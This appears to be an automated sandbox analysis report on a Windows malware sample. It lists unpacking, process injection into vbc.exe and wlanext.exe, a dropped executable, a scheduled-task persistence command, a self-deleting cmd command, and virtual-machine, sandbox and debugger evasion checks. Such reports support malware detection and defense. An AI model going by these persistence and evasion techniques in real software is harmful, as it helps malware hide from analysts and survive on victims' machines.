Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: JAAkR51fQY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

PE file has a big code size

Source: JAAkR51fQY.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Submission file is bigger than most known malware samples

Source: JAAkR51fQY.exe

Static file information: File size 1068544 > 1048576

PE file has a big raw section

Source: JAAkR51fQY.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x104200

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: JAAkR51fQY.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.269880810.00000000057AF000.00000040.00000001.sdmp, wlanext.exe, 0000000A.00000002.587511214.0000000002E60000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp
Source:	Binary string: vbc.pdb source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Unpacked PE file: 0.2.JAAkR51fQY.exe.6d0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Unpacked PE file: 0.2.JAAkR51fQY.exe.6d0000.0.unpack

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_006D23F3 push edx; retf		0_2_006D23F4
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_006D268B pushfd ; retf		0_2_006D2692
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01127A87 pushad ; ret		0_2_01127A8C
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_07927492 push ecx; iretd		0_2_07927494
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_07923C50 push esp; iretd		0_2_07923C51
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_0792744E push ecx; iretd		0_2_07927494
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_09C42893 push ecx; retf		0_2_09C42894
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_0A3B1AFA push cs; iretd		0_2_0A3B1B00
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_0A3B0B47 push ds; iretd		0_2_0A3B0B4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041508E push ebp; iretd		4_2_0041508F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret		4_2_0041C9EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0040C2CA push ds; retf		4_2_0040C2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0040C31A push ds; retf		4_2_0040C31E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_004153DF pushad ; ret		4_2_004153E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041B3B5 push eax; ret		4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041B46C push eax; ret		4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041B402 push eax; ret		4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041B40B push eax; ret		4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_00414DDA pushfd ; retf		4_2_00414DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0040EEAA push esp; retf		4_2_0040EEAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0570D0D1 push ecx; ret		4_2_0570D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EDD0D1 push ecx; ret		10_2_02EDD0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071508E push ebp; iretd		10_2_0071508F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071C9C8 push dword ptr [ECF9F4C6h]; ret		10_2_0071C9EA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0070C2CA push ds; retf		10_2_0070C2E5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0070C31A push ds; retf		10_2_0070C31E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_007153DF pushad ; ret		10_2_007153E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071B3B5 push eax; ret		10_2_0071B408
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071B46C push eax; ret		10_2_0071B472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071B402 push eax; ret		10_2_0071B408
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071B40B push eax; ret		10_2_0071B472

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.4388891588
Source: initial sample	Static PE information: section name: .text entropy: 7.4388891588

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File created: C:\Users\user\AppData\Roaming\zLIpEDZOH.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JAAkR51fQY.exe PID: 2204, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 000000000070897E second address: 0000000000708984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 4_2_004088B0 rdtsc

4_2_004088B0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\JAAkR51fQY.exe TID: 2648	Thread sleep time: -31500s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe TID: 3440	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6864	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 6688	Thread sleep count: 36 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 6688	Thread sleep time: -72000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000003.549508247.0000000008907000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000002.600579522.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000003.549031834.000000000F6AB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.252481535.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.257657621.000000000F640000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&C
Source: explorer.exe, 00000005.00000000.244973006.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.252868159.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 4_2_004088B0 rdtsc

4_2_004088B0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 4_2_00409B20 LdrLoadDll,

4_2_00409B20

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DC577 mov eax, dword ptr fs:[00000030h]		4_2_056DC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DC577 mov eax, dword ptr fs:[00000030h]		4_2_056DC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F3D43 mov eax, dword ptr fs:[00000030h]		4_2_056F3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05733540 mov eax, dword ptr fs:[00000030h]		4_2_05733540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05763D40 mov eax, dword ptr fs:[00000030h]		4_2_05763D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D7D50 mov eax, dword ptr fs:[00000030h]		4_2_056D7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0573A537 mov eax, dword ptr fs:[00000030h]		4_2_0573A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05788D34 mov eax, dword ptr fs:[00000030h]		4_2_05788D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577E539 mov eax, dword ptr fs:[00000030h]		4_2_0577E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E4D3B mov eax, dword ptr fs:[00000030h]		4_2_056E4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E4D3B mov eax, dword ptr fs:[00000030h]		4_2_056E4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E4D3B mov eax, dword ptr fs:[00000030h]		4_2_056E4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]		4_2_056C3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BAD30 mov eax, dword ptr fs:[00000030h]		4_2_056BAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05768DF1 mov eax, dword ptr fs:[00000030h]		4_2_05768DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CD5E0 mov eax, dword ptr fs:[00000030h]		4_2_056CD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CD5E0 mov eax, dword ptr fs:[00000030h]		4_2_056CD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0577FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0577FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0577FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		4_2_0577FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]		4_2_05736DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]		4_2_05736DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]		4_2_05736DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736DC9 mov ecx, dword ptr fs:[00000030h]		4_2_05736DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]		4_2_05736DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]		4_2_05736DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E35A1 mov eax, dword ptr fs:[00000030h]		4_2_056E35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057805AC mov eax, dword ptr fs:[00000030h]		4_2_057805AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057805AC mov eax, dword ptr fs:[00000030h]		4_2_057805AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E1DB5 mov eax, dword ptr fs:[00000030h]		4_2_056E1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E1DB5 mov eax, dword ptr fs:[00000030h]		4_2_056E1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E1DB5 mov eax, dword ptr fs:[00000030h]		4_2_056E1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]		4_2_056B2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]		4_2_056B2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]		4_2_056B2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]		4_2_056B2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]		4_2_056B2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]		4_2_056E2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]		4_2_056E2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]		4_2_056E2581
